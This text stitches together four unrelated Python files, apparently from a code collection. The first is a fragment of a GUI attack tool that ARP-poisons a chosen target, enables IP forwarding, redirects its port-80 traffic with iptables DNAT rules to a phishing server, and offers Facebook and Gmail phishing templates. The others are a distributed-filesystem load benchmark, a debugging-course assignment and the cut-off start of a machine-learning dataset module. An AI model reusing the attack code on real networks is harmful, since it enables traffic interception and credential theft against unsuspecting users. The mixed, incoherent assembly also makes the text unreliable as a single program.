for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def show_frm_fake(self):
self.n = frm_update_attack()
self.n.setGeometry(QRect(100, 100, 450, 300))
self.n.show()
def emit_template(self,log):
if log == 'started':
self.StatusMonitor(True,'stas_phishing')
def show_template_dialog(self):
self.Ftemplates = frm_template()
self.connect(self.Ftemplates,SIGNAL('Activated ( QString ) '), self.emit_template)
self.Ftemplates.setWindowTitle('Templates Phishing Attack')
self.Ftemplates.txt_redirect.setText(self.txt_redirect.text())
self.Ftemplates.show()
def kill_attack(self):
for i in self.ThreadDirc['Arp_posion']:
i.stop()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
try:
self.Ftemplates.killThread()
except:pass
chdir(self.owd)
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
self.conf_attack(False)
Refactor.set_ip_forward(0)
@pyqtSlot(QModelIndex)
def check_options(self,index):
if self.check_face.isChecked():
self.check_route.setChecked(False)
self.check_gmail.setChecked(False)
elif self.check_gmail.isChecked():
self.check_face.setChecked(False)
self.check_route.setChecked(False)
else:
self.check_face.setChecked(False)
self.check_gmail.setChecked(False)
def StopArpAttack(self,data):
self.StatusMonitor(False,'stas_arp')
def Start_Attack(self):
if (len(self.txt_target.text()) and len(self.txt_mac.text()) and len(self.txt_gateway.text())) == 0:
QMessageBox.information(self, 'Error Arp Attacker', 'you need set the input correctly')
else:
chdir(self.owd)
if (len(self.txt_target.text()) and len(self.txt_gateway.text())) and len(self.txt_mac.text()) != 0:
if len(self.txt_redirect.text()) != 0:
self.StatusMonitor(True,'stas_arp')
Refactor.set_ip_forward(1)
self.conf_attack(True)
thr = ThreadAttackPosion(str(self.txt_target.text()),
str(self.txt_gateway.text()),
str(self.txt_mac.text()))
self.connect(thr,SIGNAL('Activated ( QString ) '), self.StopArpAttack)
thr.setObjectName('Arp Posion')
self.ThreadDirc['Arp_posion'].append(thr)
thr.start()
def conf_attack(self,bool_conf):
if bool_conf:
self.ip = self.txt_redirect.text()
if len(self.ip) != 0:
iptables = [
'iptables -t nat --flush',
'iptables -A FORWARD --in-interface '+str(self.txt_gateway.text())+' -j ACCEPT',
'iptables -t nat --append POSTROUTING --out-interface ' +self.interfaces['activated'] +' -j MASQUERADE',
'iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination '+self.ip
]
for i in iptables:
try:system(i)
except:pass
else:
QMessageBox.information(self,'Error Redirect IP','Redirect IP not found')
else:
nano = [
'iptables --flush',
'iptables --table nat --flush' ,\
'iptables --delete-chain', 'iptables --table nat --delete-chain'
]
for delete in nano: popen(delete)
def Start_scan(self):
self.StatusMonitor(True,'stas_scan')
threadscan_check = self.configure.xmlSettings('advanced','Function_scan',None,False)
self.tables.clear()
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
if threadscan_check == 'Nmap':
try:
from nmap import PortScanner
except ImportError:
QMessageBox.information(self,'Error Nmap','The modules python-nmap not installed')
return
if self.txt_gateway.text() != '':
self.movie_screen.setDisabled(True)
self.tables.setVisible(False)
config_gateway = str(self.txt_gateway.text())
scan = ''
config_gateway = config_gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
self.ThreadScanner = ThreadScan(scan + '0/24')
self.connect(self.ThreadScanner,SIGNAL('Activated ( QString ) '), self.thread_scan_reveice)
self.StatusMonitor(True,'stas_scan')
self.ThreadScanner.start()
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
elif threadscan_check == 'Ping':
if self.txt_gateway.text() != '':
config = str(self.txt_gateway.text())
t = threading.Thread(target=self.scanner_network,args=(config,))
t.daemon = True
t.start(),t.join()
self.StatusMonitor(False,'stas_scan')
else:
QMessageBox.information(self,'Error in gateway','gateway not found.')
else:
QMessageBox.information(self,'Error on select thread Scan','thread scan not selected.')
def working(self,ip,lista):
with open(devnull, 'wb') as limbo:
result=subprocess.Popen(['ping', '-c', '1', '-n', '-W', '1', ip],
stdout=limbo, stderr=limbo).wait()
if not result:
print('online',ip)
lista[ip] = ip + '|' + self.module_network.get_mac(ip)
def scanner_network(self,gateway):
scan = ''
config_gateway = gateway.split('.')
del config_gateway[-1]
for i in config_gateway:
scan += str(i) + '.'
gateway = scan
ranger = str(self.ip_range.text()).split('-')
jobs = []
manager = Manager()
on_ips = manager.dict()
for n in xrange(int(ranger[0]),int(ranger[1])):
ip='%s{0}'.format(n)%(gateway)
p = Process(target=self.working,args=(ip,on_ips))
jobs.append(p)
p.start()
for i in jobs: i.join()
for i in on_ips.values():
Headers = []
n = i.split('|')
self.data['IPaddress'].append(n[0])
self.data['MacAddress'].append(n[1])
self.data['Hostname'].append('<unknown>')
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
for m, item in enumerate(self.data[key]):
item = QTableWidgetItem(item)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignCenter)
self.tables.setItem(m, n, item)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
def Stop_scan(self):
self.ThreadScanner.terminate()
self.StatusMonitor(False,'stas_scan')
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.tables.setVisible(True)
def StatusMonitor(self,bool,wid):
if bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ ON ]')
self.txt_status_scan.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_scan':
self.txt_status_scan.setText('[ OFF ]')
self.txt_status_scan.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ ON ]')
self.txt_statusarp.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_arp':
self.txt_statusarp.setText('[ OFF ]')
self.txt_statusarp.setStyleSheet('QLabel { color : red; }')
elif bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ ON ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : green; }')
elif not bool and wid == 'stas_phishing':
self.txt_status_phishing.setText('[ OFF ]')
self.txt_status_phishing.setStyleSheet('QLabel { color : red; }')
@pyqtSlot(QModelIndex)
def list_clicked_scan(self, index):
item = self.tables.selectedItems()
if item != []:
self.txt_target.setText(item[0].text())
else:
self.txt_target.clear()
|
|
#!/usr/bin/env python
# $Id$
#
# Author: Thilee Subramaniam
#
# Copyright 2012 Quantcast Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# This program invokes given number of client processes on the given set of
# remote clients (Java and C++) and makes use of the plan file to apply load
# on the DFS server.
import optparse
import sys
import subprocess
import time
import os
import signal
import datetime
import commands
import resource
import re
class Globals:
MASTER_PATH = ''
SLAVE_PATH = ''
SLAVE_BASE_DIR = ''
CLIENT_PATH = ''
MSTRESS_LOCK = '/tmp/mstress_master.lock'
SIGNALLED = False
SERVER_CMD = ""
SERVER_KEYWORD = ""
KFS_SERVER_CMD = "metaserver"
KFS_SERVER_KEYWORD = "metaserver"
HDFS_SERVER_CMD = "java"
HDFS_SERVER_KEYWORD = "NameNode"
def ParseCommandline():
parser = optparse.OptionParser()
parser.add_option('-m', '--mode',
action='store',
default='master',
type='string',
help='Run as master or slave')
parser.add_option('-f', '--filesystem',
action='store',
default=None,
type='string',
help='Filesystem whose metaserver to test. qfs or hdfs.')
parser.add_option('-s', '--server',
action='store',
default=None,
type='string',
help='Metaserver or Namenode hostname.')
parser.add_option('-p', '--port',
action='store',
default=None,
type='int',
help='Metaserver or Namenode port')
parser.add_option('-c', '--client-hostname',
action='store',
default=None,
type='string',
help='mstress slave\'s hostname (slave only option).')
parser.add_option('-k', '--client-lookup-key',
action='store',
default=None,
type='string',
help='mstress slave\'s lookup key to be used (slave only option).')
parser.add_option('-t', '--client-testname',
action='store',
default=None,
type='string',
help='Test to run on mstress slave (slave only option).')
parser.add_option('-a', '--plan',
action='store',
default='%s/plan/plan' % (os.path.dirname(os.path.realpath(__file__))),
type='string',
help='Plan file containing client instructions in the client.')
parser.add_option('-l', '--leave-files', action='store_true',
default=False, help='Leave files. Does not perform delete test.')
opts, args = parser.parse_args()
if args:
sys.exit('Unexpected arguments: %s.' % str(args))
if not opts.filesystem or not opts.server or not opts.port:
sys.exit('Missing mandatory arguments.')
if opts.mode not in ('master', 'slave'):
sys.exit('Invalid mode.')
if opts.mode == 'master':
# master should not have -c option
if opts.client_hostname is not None:
sys.exit('Master: does not support -c option.')
if opts.client_testname is not None:
sys.exit('Master: does not support -t option.')
else:
# for slave, this is the slave host name.
hosts = opts.client_hostname.split(',')
if len(hosts) != 1:
sys.exit('Slave: Error in client host name.')
if opts.client_testname is None or opts.client_lookup_key is None:
sys.exit('Slave: Error in client test name or lookup key.')
return opts
def PrintMemoryUsage(opts):
if sys.platform in ('Darwin', 'darwin'):
psCmd = "ps -o rss,pid,command | grep %s | grep %s | grep -v grep | awk '{print $1}'" % (Globals.SERVER_CMD, Globals.SERVER_KEYWORD)
else:
psCmd = "ps -C %s -o rss,pid,cmd | grep %s | awk '{print $1}'" % (Globals.SERVER_CMD, Globals.SERVER_KEYWORD)
proc = subprocess.Popen(['ssh', opts.server, psCmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
result = proc.communicate()
if result and len(result[0].strip()) > 0:
print "Memory usage %sKB" % result[0].strip()
else:
print "Memory usage <unknown> KB"
def RunMStressMaster(opts, hostsList):
""" Called when run in master mode. Calls master funcions for 'create',
'stat', and 'readdir'.
Args:
opts: options object, from parsed commandine options.
hostsList: list of hosts obtained from plan file.
Returns:
True on success. False on failure.
"""
# print 'Master: called with %r, %r' % (opts, hostsList)
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'create_write') == False:
return False
deltaTime = datetime.datetime.now() - startTime
print '\nMaster: Create & Write test took %d.%d sec' % (deltaTime.seconds, deltaTime.microseconds/1000000)
PrintMemoryUsage(opts)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'stat') == False:
return False
deltaTime = datetime.datetime.now() - startTime
print '\nMaster: Stat test took %d.%d sec' % (deltaTime.seconds, deltaTime.microseconds/1000000)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'readdir') == False:
return False
deltaTime = datetime.datetime.now() - startTime
print '\nMaster: Readdir test took %d.%d sec' % (deltaTime.seconds, deltaTime.microseconds/1000000)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'read') == False:
return False
deltaTime = datetime.datetime.now() - startTime
print '\nMaster: Read test took %d.%d sec' % (deltaTime.seconds, deltaTime.microseconds/1000000)
print '=========================================='
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'rename') == False:
return False
deltaTime = datetime.datetime.now() - startTime
print '\nMaster: Rename test took %d.%d sec' % (deltaTime.seconds, deltaTime.microseconds/1000000)
print '=========================================='
if opts.leave_files:
print "\nNot Renaming files because of -l option"
return False
startTime = datetime.datetime.now()
if RunMStressMasterTest(opts, hostsList, 'delete') == False:
return False
deltaTime = datetime.datetime.now() - startTime
print '\nMaster: Delete test took %d.%d sec' % (deltaTime.seconds, deltaTime.microseconds/1000000)
print '=========================================='
PrintStatsFromClients(hostsList, opts)
return True
def PrintStatsFromClients(hostsList, opts):
"""
Called at the end of benchmarking. This function ssh's into each of the
client hosts and greps the client logs for benchmark lines inserted by the
MStress_Client
Args:
opts: options object, from parsed commandline options.
hostsList: list of hosts obtained from plan file.
"""
# kick off grepping the log files in the client hosts
running_procs = []
for host in hostsList:
p = subprocess.Popen(['/usr/bin/ssh', host,
"grep -e '\\[benchmark\\]' %s/plan/*client.log | cut -d' ' \
-f 2,3" % (Globals.SLAVE_BASE_DIR)],
stdout=subprocess.PIPE)
running_procs.append(p)
# mapping from call (str) -> list of timings (float)
# we maintain all the latencies in this dictionary -> list mapping
timings = {}
for proc in running_procs:
# block until that ssh child is done, and then read out its standard out.
out, err = proc.communicate()
if out:
# the lines are of the form:
# create_write: 0.023874,0.26489 ...
# rename: 0.005003 ...
# parse and bucket them into the timings dictionary
for line in out.split('\n'):
if ' ' not in line:
continue
(call, latencies) = line.split(' ', 1)
latencies = latencies.strip()
if latencies == '':
continue
if call not in timings:
timings[call] = []
timings[call].extend(map(lambda x: float(x), latencies.split(',')))
# for each of the calls, compute the metrics and print them out
for call in timings:
timings[call].sort()
total = sum(timings[call])
if total > 0:
avg = total/len(timings[call])
else:
avg = 0
print "%s num=%d, sum=%f, avg=%f, p50=%f, p90=%f" % (call,
len(timings[call]),
total,
avg,
pct(timings[call], 50),
pct(timings[call], 90))
def pct(l, p):
""" returns the `p`-th percentile element in a sorted list `l`"""
return l[(int)((p/100.0)*len(l))]
def RunMStressMasterTest(opts, hostsList, test):
""" Called when run in master mode. Invokes the slave version of the same
program on the provided hosts list with the given test name.
Args:
opts: parsed commandline options.
hostsList: list of hosts obtained from plan file.
test: string: test name to call.
Returns:
False on error, True on success
"""
if Globals.SIGNALLED:
return False
# invoke remote master client.
ssh_cmd = '%s -m slave -f %s -s %s -p %d -t %s' % (
Globals.SLAVE_PATH,
opts.filesystem,
opts.server,
opts.port,
test)
clientHostMapping = MapHostnameForTest(hostsList, test)
running_procs = {}
for client in hostsList:
slaveLogfile = Globals.SLAVE_BASE_DIR + '/plan/plan_' + client + '_' + test + '_' + opts.filesystem + '.slave.log'
p = subprocess.Popen(['/usr/bin/ssh', client,
'%s -c %s -k %s >& %s' % (ssh_cmd, client, clientHostMapping[client], slaveLogfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
running_procs[p] = client
success = True
isLine1 = True
while running_procs:
tobedelkeys = []
for proc in running_procs.iterkeys():
client = running_procs[proc]
retcode = proc.poll()
if retcode is not None:
sout,serr = proc.communicate()
if sout:
print '\nMaster: output of slave (%s):%s' % (client, sout)
if serr:
print '\nMaster: err of slave (%s):%s' % (client, serr)
tobedelkeys.append(proc)
if retcode != 0:
print "\nMaster: '%s' test failed. Please make sure test directory is empty and has write permission, or check slave logs." % test
success = False
else:
if Globals.SIGNALLED:
proc.terminate()
for k in tobedelkeys:
del running_procs[k]
if running_procs:
if isLine1:
sys.stdout.write('Master: remote slave running \'%s\'' % test)
isLine1 = False
else:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.5)
return success
def MapHostnameForTest(clients, test):
""" Determines the '-c' argument to use for slave invocation. This argument
is passed to the C++/Java client so that the client can use it as a key
to read the plan file.
For 'create', this name is the same as the client name. But for doing
a 'stat' or a 'readdir' we want to run the tests on a client different
from the one that created the path.
Args:
clients: list of strings, clients.
test: string, the name of the test.
Returns:
map of strings, client name to '-c' argument.
"""
mapping = {}
length = len(clients)
for i in range(0, length):
if test == 'stat' or test == 'readdir' or test == 'read':
mapping[clients[i]] = clients[(i+1)%length]
else:
mapping[clients[i]] = clients[i]
return mapping
def RunMStressSlave(opts, clientsPerHost):
""" Called when the code is run in slave mode, on each slave.
Invokes number of client processes equal to 'clientsPerHost'.
Args:
opts: parsed commandline options.
clientsPerHost: integer, number of processes to run on each host.
Returns:
True if client returns success. False otherwise.
"""
print 'Slave: called with %r, %d' % (opts, clientsPerHost)
os.putenv('KFS_CLIENT_DEFAULT_FATTR_REVALIDATE_TIME',"-1")
running_procs = []
for i in range(0, clientsPerHost):
clientLogfile = '%s_%s_proc_%02d_%s_%s.client.log' % (opts.plan, opts.client_hostname, i, opts.client_testname, opts.filesystem)
args = ["%s -s %s -p %s -a %s -c %s -t %s -n proc_%02d >& %s" % (
Globals.CLIENT_PATH,
opts.server,
str(opts.port),
opts.plan,
opts.client_lookup_key,
opts.client_testname,
i,
clientLogfile)]
print 'Slave: args = %r' % args
p = subprocess.Popen(args,
shell=True,
executable='/bin/bash',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
running_procs.append(p)
success = True
isLine1 = True
while running_procs:
for proc in running_procs:
ret = proc.poll()
if ret is not None:
sout,serr = proc.communicate()
if sout:
print '\nSlave: output of (ClientHost %s, ClientNo %r):%s' % (opts.client_hostname, proc, sout)
if serr:
print '\nSlave: err of (ClientHost %s, ClientNo %r):%s' % (opts.client_hostname, proc, serr)
running_procs.remove(proc)
if ret != 0:
print '\nSlave: mstress client failed. Please check client logs.'
success = False
else:
if Globals.SIGNALLED:
proc.terminate()
if running_procs:
if isLine1:
sys.stdout.write('Slave: load client \'%s\' running' % opts.client_testname)
isLine1 = False
else:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.5)
return success
def ReadPlanFile(opts):
""" Reads the given plan file to extract the list of client-hosts and
process-count per client-host.
Args:
opts: parsed commandline options.
Returns:
hostslist: list of client host names
clientsPerHost: integer: client processes per client host.
"""
hostsList = None
clientsPerHost = None
leafType = None
numLevels = None
numToStat = None
nodesPerLevel = None
planfile = open(opts.plan, 'r')
for line in planfile:
if line.startswith('#'):
continue
if line.startswith('hostslist='):
hostsList = line[len('hostslist='):].strip().split(',')
elif line.startswith('clientsperhost='):
clientsPerHost = int(line[len('clientsperhost='):].strip())
elif line.startswith('type='):
leafType = line[len('type='):].strip()
elif line.startswith('levels='):
numLevels = int(line[len('levels='):].strip())
elif line.startswith('nstat='):
numToStat = int(line[len('nstat='):].strip())
elif line.startswith('inodes='):
nodesPerLevel = int(line[len('inodes='):].strip())
planfile.close()
if None in (hostsList, clientsPerHost, leafType, numLevels, numToStat, nodesPerLevel):
sys.exit('Failed to read plan file')
nodesPerProcess = 0
leafNodesPerProcess = 0
for l in range(1,numLevels+1):
nodesPerProcess += pow(nodesPerLevel,l)
if l == numLevels:
leafNodesPerProcess = pow(nodesPerLevel,l)
inters = nodesPerProcess - leafNodesPerProcess
overallNodes = nodesPerProcess * len(hostsList) * clientsPerHost
overallLeafs = leafNodesPerProcess * len(hostsList) * clientsPerHost
intermediateNodes = inters * len(hostsList) * clientsPerHost + len(hostsList) * clientsPerHost + 1
totalNumToStat = numToStat * len(hostsList) * clientsPerHost
print ('Plan:\n' +
' o %d client processes on each of %d hosts will generate load.\n' % (clientsPerHost, len(hostsList)) +
' o %d levels of %d nodes (%d leaf nodes, %d total nodes) will be created by each client process.\n' % (numLevels, nodesPerLevel, leafNodesPerProcess, nodesPerProcess) +
' o Overall, %d leaf %ss will be created, %d intermediate directories will be created.\n' % (overallLeafs, leafType, intermediateNodes))
return hostsList, clientsPerHost
def SetGlobalPaths(opts):
if opts.mode == 'master':
mydir = os.path.dirname(os.path.realpath(__file__))
Globals.MASTER_PATH = os.path.join(mydir, 'mstress.py')
Globals.SLAVE_BASE_DIR = '/tmp/%s' % os.path.basename(mydir)
mydir = '/tmp/%s' % os.path.basename(os.path.dirname(os.path.realpath(__file__)))
Globals.SLAVE_PATH = os.path.join(mydir, 'mstress.py')
Globals.SLAVE_BASE_DIR = mydir
if opts.filesystem == 'qfs':
Globals.CLIENT_PATH = os.path.join(mydir, 'mstress_client')
Globals.SERVER_CMD = Globals.KFS_SERVER_CMD
Globals.SERVER_KEYWORD = Globals.KFS_SERVER_KEYWORD
elif opts.filesystem == 'hdfs':
hdfsjars = commands.getoutput("echo %s/mstress_hdfs_client_jars/*.jar | sed 's/ /:/g'" % mydir)
Globals.CLIENT_PATH = 'java -Xmx256m -cp %s:%s MStress_Client' % (mydir,hdfsjars)
Globals.SERVER_CMD = Globals.HDFS_SERVER_CMD
Globals.SERVER_KEYWORD = Globals.HDFS_SERVER_KEYWORD
else:
sys.exit('Invalid filesystem option')
def CreateLock(opts):
if opts.mode != 'master':
return
if os.path.exists(Globals.MSTRESS_LOCK):
sys.exit('Program already running. Please wait till it finishes')
f = open(Globals.MSTRESS_LOCK, 'w')
f.write(str(os.getpid()))
f.close()
def RemoveLock(opts):
if opts.mode != 'master':
return
if os.path.exists(Globals.MSTRESS_LOCK):
f = open(Globals.MSTRESS_LOCK, 'r')
pid = f.read()
f.close()
if int(pid) == os.getpid():
os.unlink(Globals.MSTRESS_LOCK)
def HandleSignal(signum, frame):
print "Received signal, %d" % signum
Globals.SIGNALLED = True
def main():
signal.signal(signal.SIGTERM, HandleSignal)
signal.signal(signal.SIGINT, HandleSignal)
signal.signal(signal.SIGHUP, HandleSignal)
opts = ParseCommandline()
SetGlobalPaths(opts)
CreateLock(opts)
try:
(hostsList,clientsPerHost) = ReadPlanFile(opts)
if opts.mode == 'master':
return RunMStressMaster(opts, hostsList)
else:
return RunMStressSlave(opts, clientsPerHost)
finally:
RemoveLock(opts)
if __name__ == '__main__':
success = main()
if success:
sys.exit(0)
else:
sys.exit(1)
|
|
#!/usr/bin/env python
# INSTRUCTIONS
# Your task for this assignment is to combine the principles that you learned
# in unit 3, 4 and 5 and create a fully automated program that can display
# the cause-effect chain automatically.
# In problem set 4 you created a program that generated cause chain
# if you provided it the locations (line and iteration number) to look at.
# That is not very useful. If you know the lines to look for changes, you
# already know a lot about the cause. Instead now, with the help of concepts
# introduced in unit 5 (line coverage), improve this program to create
# the locations list automatically, and then use it to print out only the
# failure inducing lines, as before.
# See some hints at the provided functions, and an example output at the end.
import sys
import copy
#buggy program
def remove_html_markup(s):
tag = False
quote = False
out = ""
for c in s:
if c == '<' and not quote:
tag = True
elif c == '>' and not quote:
tag = False
elif c == '"' or c == "'" and tag:
quote = not quote
elif not tag:
out = out + c
return out
def ddmin(s):
# you may need to use this to test if the values you pass actually make
# test fail.
assert test(s) == "FAIL"
n = 2 # Initial granularity
while len(s) >= 2:
start = 0
subset_length = len(s) / n
some_complement_is_failing = False
while start < len(s):
complement = s[:start] + s[start + subset_length:]
if test(complement) == "FAIL":
s = complement
n = max(n - 1, 2)
some_complement_is_failing = True
break
start += subset_length
if not some_complement_is_failing:
if n == len(s):
break
n = min(n * 2, len(s))
return s
# Use this function to record the covered lines in the program, in order of
# their execution and save in the list coverage
coverage = []
def traceit(frame, event, arg):
global coverage
# YOUR CODE HERE
if event == 'line':
coverage.append(frame.f_lineno)
return traceit
# We use these variables to communicate between callbacks and drivers
the_line = None
the_iteration = None
the_state = None
the_diff = None
the_input = None
# Stop at THE_LINE/THE_ITERATION and store the state in THE_STATE
def trace_fetch_state(frame, event, arg):
global the_line
global the_iteration
global the_state
if frame.f_lineno == the_line:
the_iteration = the_iteration - 1
if the_iteration == 0:
the_state = copy.deepcopy(frame.f_locals)
the_line = None # Don't get called again
return None # Don't get called again
return trace_fetch_state
# Get the state at LINE/ITERATION
def get_state(input, line, iteration):
global the_line
global the_iteration
global the_state
the_line = line
the_iteration = iteration
sys.settrace(trace_fetch_state)
y = remove_html_markup(input)
sys.settrace(None)
return the_state
# Stop at THE_LINE/THE_ITERATION and apply the differences in THE_DIFF
def trace_apply_diff(frame, event, arg):
global the_line
global the_diff
global the_iteration
if frame.f_lineno == the_line:
the_iteration = the_iteration - 1
if the_iteration == 0:
frame.f_locals.update(the_diff)
the_line = None
return None # Don't get called again
return trace_apply_diff
# Testing function: Call remove_html_output, stop at THE_LINE/THE_ITERATION,
# and apply the diffs in DIFFS at THE_LINE
def test(diffs):
global the_diff
global the_input
global the_line
global the_iteration
line = the_line
iteration = the_iteration
the_diff = diffs
sys.settrace(trace_apply_diff)
y = remove_html_markup(the_input)
sys.settrace(None)
the_line = line
the_iteration = iteration
if y.find('<') == -1:
return "PASS"
else:
return "FAIL"
def make_locations(coverage):
# YOUR CODE HERE
# This function should return a list of tuples in the format
# [(line, iteration), (line, iteration) ...], as auto_cause_chain
# expects.
locations = []
save_line = {}
for line in coverage:
if line not in save_line:
save_line[line] = 0
locations.append((line, save_line[line]+1))
save_line[line] = save_line[line] + 1
return locations
def auto_cause_chain(locations):
global html_fail, html_pass, the_input, the_line, the_iteration, the_diff
print "The program was started with", repr(html_fail)
# Test over multiple locations
last_cause = []
for (line, iteration) in locations:
# Get the passing and the failing state
state_pass = get_state(html_pass, line, iteration)
state_fail = get_state(html_fail, line, iteration)
if state_pass == None or state_fail == None:
continue
# Compute the differences
diffs = []
for var in state_fail.keys():
if not state_pass.has_key(var) or state_pass[var] != state_fail[var]:
diffs.append((var, state_fail[var]))
# Minimize the failure-inducing set of differences
# Since this time you have all the covered lines and iterations in
# locations, you will have to figure out how to automatically detect
# which lines/iterations are the ones that are part of the
# failure chain and print out only these.
the_input = html_pass
the_line = line
the_iteration = iteration
# You will have to use the following functions and output formatting:
# cause = ddmin(diffs)
# # Pretty output
# print "Then", var, "became", repr(value)
if diffs != [] and test(diffs) == 'FAIL':
cause = ddmin(diffs)
if cause != last_cause:
for var, val in cause:
print "Then", var, "became", repr(val)
last_cause = cause
print "Then the program failed."
###### Testing runs
# We will test your function with different strings and on a different function
html_fail = '"<b>foo</b>"'
html_pass = "'<b>foo</b>'"
# This will fill the coverage variable with all lines executed in a
# failing run
coverage = []
sys.settrace(traceit)
remove_html_markup(html_fail)
sys.settrace(None)
#print coverage
locations = make_locations(coverage)
#print locations
auto_cause_chain(locations)
# The coverage :
# [8, 9, 10, 11, 12, 14, 16, 17, 11, 12... # and so on
# The locations:
# [(8, 1), (9, 1), (10, 1), (11, 1), (12, 1)... # and so on
# The output for the current program and test strings should look like follows:
"""
The program was started with '"<b>foo</b>"'
Then s became '"<b>foo</b>"'
Then c became '"'
Then quote became True
...
"""
|
|
"""Learn to estimate functions from examples. (Chapters 18-20)"""
from . utils import *
import copy
import heapq
import math
import random
from collections import defaultdict
#______________________________________________________________________________
def rms_error(predictions, targets):
return math.sqrt(ms_error(predictions, targets))
def ms_error(predictions, targets):
return mean([(p - t)**2 for p, t in zip(predictions, targets)])
def mean_error(predictions, targets):
return mean([abs(p - t) for p, t in zip(predictions, targets)])
def mean_boolean_error(predictions, targets):
return mean([(p != t) for p, t in zip(predictions, targets)])
#______________________________________________________________________________
class DataSet:
"""A data set for a machine learning problem. It has the following fields:
d.examples A list of examples. Each one is a list of attribute values.
d.attrs A list of integers to index into an example, so example[attr]
gives a value. Normally the same as range(len(d.examples[0])).
d.attrnames Optional list of mnemonic names for corresponding attrs.
d.target The attribute that a learning algorithm will try to predict.
By default the final attribute.
d.inputs The list of attrs without the target.
d.values A list of lists: each sublist is the set of possible
values for the corresponding attribute. If initially None,
it is computed from the known examples by self.setproblem.
If not None, an erroneous value raises ValueError.
d.distance A function from a pair of examples to a nonnegative number.
Should be symmetric, etc. Defaults to mean_boolean_error
since that can handle any field types.
d.name Name of the data set (for output display only).
d.source URL or other source where the data came from.
Normally, you call the constructor and you're done; then you just
access fields like d.examples and d.target and d.inputs."""
def __init__(self, examples=None, attrs=None, attrnames=None, target=-1,
inputs=None, values=None, distance=mean_boolean_error,
name='', source='', exclude=()):
"""Accepts any of DataSet's fields. Examples can also be a
string or file from which to parse examples using parse_csv.
Optional parameter: exclude, as documented in .setproblem().
>>> DataSet(examples='1, 2, 3')
<DataSet(): 1 examples, 3 attributes>
"""
update(self, name=name, source=source,
values=values, distance=distance)
# Initialize .examples from string or list or data directory
if isinstance(examples, str):
self.examples = parse_csv(examples)
elif examples is None:
self.examples = parse_csv(DataFile(name+'.csv').read())
else:
self.examples = examples
# Attrs are the indices of examples, unless otherwise stated.
if not attrs and self.examples:
attrs = list(range(len(self.examples[0])))
self.attrs = attrs
# Initialize .attrnames from string, list, or by default
if isinstance(attrnames, str):
self.attrnames = attrnames.split()
else:
self.attrnames = attrnames or attrs
self.setproblem(target, inputs=inputs, exclude=exclude)
def setproblem(self, target, inputs=None, exclude=()):
"""Set (or change) the target and/or inputs.
This way, one DataSet can be used multiple ways. inputs, if specified,
is a list of attributes, or specify exclude as a list of attributes
to not use in inputs. Attributes can be -n .. n, or an attrname.
Also computes the list of possible values, if that wasn't done yet."""
self.target = self.attrnum(target)
exclude = list(map(self.attrnum, exclude))
if inputs:
self.inputs = removeall(self.target, inputs)
else:
self.inputs = [a for a in self.attrs
if a != self.target and a not in exclude]
if not self.values:
self.values = list(map(unique, list(zip(*self.examples))))
self.check_me()
def check_me(self):
"Check that my fields make sense."
assert len(self.attrnames) == len(self.attrs)
assert self.target in self.attrs
assert self.target not in self.inputs
assert set(self.inputs).issubset(set(self.attrs))
list(map(self.check_example, self.examples))
def add_example(self, example):
"Add an example to the list of examples, checking it first."
self.check_example(example)
self.examples.append(example)
def check_example(self, example):
"Raise ValueError if example has any invalid values."
if self.values:
for a in self.attrs:
if example[a] not in self.values[a]:
raise ValueError('Bad value %s for attribute %s in %s' %
(example[a], self.attrnames[a], example))
def attrnum(self, attr):
"Returns the number used for attr, which can be a name, or -n .. n-1."
if isinstance(attr, str):
return self.attrnames.index(attr)
elif attr < 0:
return len(self.attrs) + attr
else:
return attr
def sanitize(self, example):
"Return a copy of example, with non-input attributes replaced by None."
return [attr_i if i in self.inputs else None
for i, attr_i in enumerate(example)]
def __repr__(self):
return '<DataSet(%s): %d examples, %d attributes>' % (
self.name, len(self.examples), len(self.attrs))
#______________________________________________________________________________
def parse_csv(input, delim=','):
r"""Input is a string consisting of lines, each line has comma-delimited
fields. Convert this into a list of lists. Blank lines are skipped.
Fields that look like numbers are converted to numbers.
The delim defaults to ',' but '\t' and None are also reasonable values.
>>> parse_csv('1, 2, 3 \n 0, 2, na')
[[1, 2, 3], [0, 2, 'na']]
"""
lines = [line for line in input.splitlines() if line.strip()]
